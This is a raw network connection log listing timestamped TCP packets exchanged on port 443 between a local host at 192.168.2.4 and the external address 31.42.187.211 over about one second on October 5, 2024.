Oct 5, 2024 01:03:20.463102102 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.509608984 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.542344093 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.542383909 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.542427063 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.542440891 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.542468071 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.542489052 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.580060005 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.580092907 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.580164909 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.580185890 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.580214977 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.580235958 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.581988096 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.582019091 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.582075119 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.582087994 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.582113981 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.582138062 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.583933115 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.583986998 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.584021091 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.584033012 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.584059000 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.584076881 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.585978985 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.586025000 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.586076021 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.586087942 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.586112976 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.586141109 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.587420940 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.587470055 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.587507963 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.587521076 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.587548971 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.587608099 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.589169025 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.589215994 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.589250088 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.589262009 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.589292049 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.589310884 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.590262890 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.590306997 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.590339899 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.590352058 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.590378046 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.590400934 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.591983080 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.592025995 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.592060089 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.592072010 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.592098951 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.592118979 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.717137098 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.717200041 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.717355967 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.717379093 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.717483997 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.718960047 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.719010115 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.719057083 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.719084978 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.719116926 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.719136000 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.741374016 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.741441011 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.741580963 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.741595030 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.741727114 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.743088961 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.743145943 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.743180037 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.743192911 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.743220091 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.743241072 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.744622946 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.744668007 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.744700909 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.744713068 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.744750023 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.744750023 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.746324062 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.746371031 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.746406078 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.746417999 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.746445894 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.746464968 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.747275114 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.747328043 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.747358084 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.747369051 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.747421980 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.747421980 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.856519938 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.856539965 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.856594086 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.856606007 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.856620073 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.856642962 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.857234955 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.857253075 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.857294083 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.857311010 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.857336044 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.857356071 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.858937025 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.858954906 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.859005928 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.859018087 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.859044075 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.859064102 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.860706091 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.860724926 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.860764980 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.860783100 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.860807896 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.860827923 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.882484913 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.882502079 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.882561922 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.882570982 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.882606983 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.884121895 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.884170055 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.884195089 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.884207010 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.884232044 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.884251118 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.885955095 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.885999918 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.886049032 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.886060953 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.886086941 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.886106968 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.886806011 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.886857986 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.886879921 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.886892080 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.886915922 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.886934996 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.888621092 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.888664007 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.888696909 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.888709068 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.888737917 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.888762951 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.944657087 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.944700003 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.944751978 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.944773912 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.944797993 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.944818020 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.945524931 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.945571899 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.945605040 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.945616007 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.945641041 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.945666075 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.947257996 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.947305918 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.947331905 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.947343111 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.947369099 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.947402000 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.969152927 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.969219923 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.969269037 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.969281912 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.969311953 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.969330072 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.971406937 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.971457005 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.971503019 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.971514940 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.971544027 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.971563101 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.972479105 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.972524881 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.972558022 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.972568989 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.972594023 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.972609997 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.974314928 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.974375010 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.974406958 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.974419117 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.974446058 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.974468946 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.976033926 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.976085901 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.976118088 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.976130009 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:20.976156950 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:20.976193905 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.031769037 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.031841040 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.031883001 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.031905890 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.031940937 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.031961918 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.032629967 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.032674074 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.032720089 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.032731056 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.032758951 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.032774925 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.034219980 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.034269094 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.034288883 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.034301043 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.034328938 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.034348011 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.056492090 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.056557894 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.056586027 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.056598902 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.056629896 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.056648970 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.058476925 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.058533907 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.058573008 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.058584929 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.058613062 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.058629036 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.059824944 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.059870005 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.059900045 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.059911966 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.059938908 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.059958935 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.061534882 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.061583996 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.061619997 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.061633110 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.061657906 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.061676979 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.062371969 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.062412024 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.062446117 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.062458992 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.062484026 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.062501907 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.118590117 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.118647099 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.118715048 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.118729115 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.118772984 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.118772984 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.119787931 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.119841099 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.119894028 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.119906902 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.119935036 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.119952917 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.142671108 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.142749071 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.142766953 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.142781019 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.142817974 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.142838001 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.144112110 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.144160986 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.144182920 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.144196033 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.144231081 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.144231081 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.145750999 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.145795107 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.145836115 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.145853043 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.145875931 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.146536112 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.146600962 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.146612883 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.146636963 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.146675110 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.146694899 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.148264885 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.148329020 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.148338079 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.148355007 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.148391008 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.148412943 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.204257965 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.204319954 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.204387903 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.204406977 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.204436064 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.204452991 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.205451965 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.205496073 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.205646038 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.205658913 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.206924915 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.207030058 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.207065105 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.207077980 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.207108974 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.207127094 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.229614019 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.229662895 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.229718924 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.229743958 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.229772091 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.230926037 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.230976105 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.231024981 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.231040001 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.231065035 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.231085062 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.231096029 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.232250929 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.232290983 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.232336044 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.232350111 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.232383013 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.233567953 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.233613014 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.233666897 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.233680010 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.233707905 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.234421968 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.234462023 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.234512091 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.234524965 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.234549046 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.275157928 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.291255951 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.291321039 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.291356087 CEST	49753	443	192.168.2.4	31.42.187.211
